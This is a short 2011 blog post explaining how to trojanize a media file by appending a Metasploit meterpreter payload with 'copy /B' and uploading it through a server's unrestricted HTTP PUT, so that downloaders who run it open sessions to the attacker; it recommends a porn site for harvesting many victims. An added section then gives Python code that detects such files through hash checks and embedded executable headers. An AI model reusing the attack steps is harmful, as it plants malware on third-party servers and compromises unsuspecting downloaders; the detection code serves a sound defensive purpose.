Thursday, June 23, 2011

Combining Files

I’m going to combine my two previous posts, here and here, for this exploit in combining files. Say you find a site that is vulnerable to PUT * HTTP/1.0 and has downloadable content. I would recommend downloading a file off the server; in this case, for me, it will be 03.mpg. I’m going to combine 03.mpg with my Metasploit binary payload, meterpreter.exe.
We can use the Windows command prompt to do this.
C:\ >copy /B 03.mpg + meterpreter.exe file.mpg
03.mpg
meterpreter.exe
1 file(s) copied.
The copy /B makes the output a binary file. So now you can take file.mpg, rename it to 03.mpg, and PUT it back on the server; whenever someone downloads the file and runs it, it will spawn a meterpreter session to you. Say you do this on a porn site: you can get multiple meterpreter sessions for easy exploiting.
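For whoever runs the server, a file built with copy /B is easy to spot: it no longer matches its known-good hash, and a full executable header sits somewhere after the media data. The check below is an added example, not part of the original post; the function names, sample bytes and baseline hash are constructed for illustration.

```python
import hashlib
import struct

def find_embedded_pe(data: bytes) -> list:
    """Return offsets > 0 where an 'MZ' header points at a valid PE signature."""
    hits = []
    pos = data.find(b"MZ", 1)      # offset 0 would be a plain executable, not an appended one
    while pos != -1:
        lfanew_at = pos + 0x3C     # e_lfanew: 4-byte little-endian offset of the PE header
        if lfanew_at + 4 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, lfanew_at)
            pe_at = pos + e_lfanew
            # Requiring the PE signature filters out stray "MZ" bytes in media data.
            if e_lfanew > 0 and data[pe_at:pe_at + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits

def check_file(data: bytes, known_sha256: str) -> dict:
    """Compare content against a baseline hash and scan for appended executables."""
    return {
        "hash_matches": hashlib.sha256(data).hexdigest() == known_sha256,
        "embedded_pe_offsets": find_embedded_pe(data),
    }

# Constructed sample data: not real media and not a working executable.
CLEAN_MEDIA = b"\x00\x00\x01\xba" + b"\x44" * 200 + b"MZ-looking noise"
PE_STUB = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
TAMPERED = CLEAN_MEDIA + PE_STUB   # same byte layout that copy /B produces
BASELINE = hashlib.sha256(CLEAN_MEDIA).hexdigest()  # recorded when the file was published

if __name__ == "__main__":
    print("clean:   ", check_file(CLEAN_MEDIA, BASELINE))
    print("tampered:", check_file(TAMPERED, BASELINE))
```

Run against every downloadable file on a schedule, the hash comparison catches any replacement made through PUT, and the header scan shows where the appended data begins.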

Enjoy!
